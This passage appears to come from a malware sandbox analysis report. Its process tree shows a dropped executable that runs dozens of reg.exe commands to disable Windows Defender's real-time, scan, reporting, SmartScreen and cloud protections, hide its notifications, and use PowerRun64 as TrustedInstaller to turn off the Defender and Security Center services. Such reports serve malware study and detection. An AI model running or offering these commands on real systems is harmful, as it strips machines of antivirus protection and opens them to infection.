        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2528
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:3320
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:3332
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:4424
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:3416
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4172
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2452
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2588
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2788
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5020
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4836
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
        5⤵
        
        PID:2540
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1796
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:2020
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1432
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3076
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:452
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:1892
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f
        5⤵
        
        PID:2620
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4736
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:3644
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4848
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4576
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4600
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:392
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4020
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3388
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f
        5⤵
        
        PID:1584
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1576
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:4504
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3792
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:1232
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
        5⤵
        
        PID:4040
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f
        5⤵
        
        PID:2696
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:3628
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
        5⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2752
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
        5⤵
        
        PID:2420
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f
        5⤵
        
        PID:4852
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2704
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f
        5⤵
        
        PID:4204
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f
        5⤵
        
        PID:856
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
        5⤵
        
        PID:3536
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f
        5⤵
        
        PID:1264
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:2328
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:5100
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
        5⤵
        
        PID:4400
    - - C:\Windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
        5⤵
        
        PID:4476
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:3600
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of SetWindowsHookEx
        
        PID:4272
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:4436
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:380
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2588
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:2656
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:2620
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:4324
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:3420
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:3388
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:4852
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:3644
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:2964
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:1168
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:4580
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:3624
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:4120
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:4276
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:1660
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2992
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:1116
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:684
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:216
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:4436
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:3504
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:5028
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4408
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:3792
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:8
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        Executes dropped EXE
        Suspicious use of SetWindowsHookEx
        
        PID:4576
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:3060
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:112
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:4328
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4184
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:4276
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:3116
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4228
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:3416
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:3352
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2656
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1620
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:3872
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:4500
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2608
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1700
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:3848
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2132
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:4824
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:1284
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:2964
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:2812
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:1052
      - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        6⤵
        
        PID:2912
        
        C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        "C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        7⤵
        
        PID:4208
        
        C:\Windows\System32\reg.exe
        
        "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f
        8⤵
        
        PID:3412
    - - C:\Users\Admin\AppData\Local\Temp\nsf739C.tmp\PowerRun64.exe
        
        PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
        5⤵
        
        PID:2168
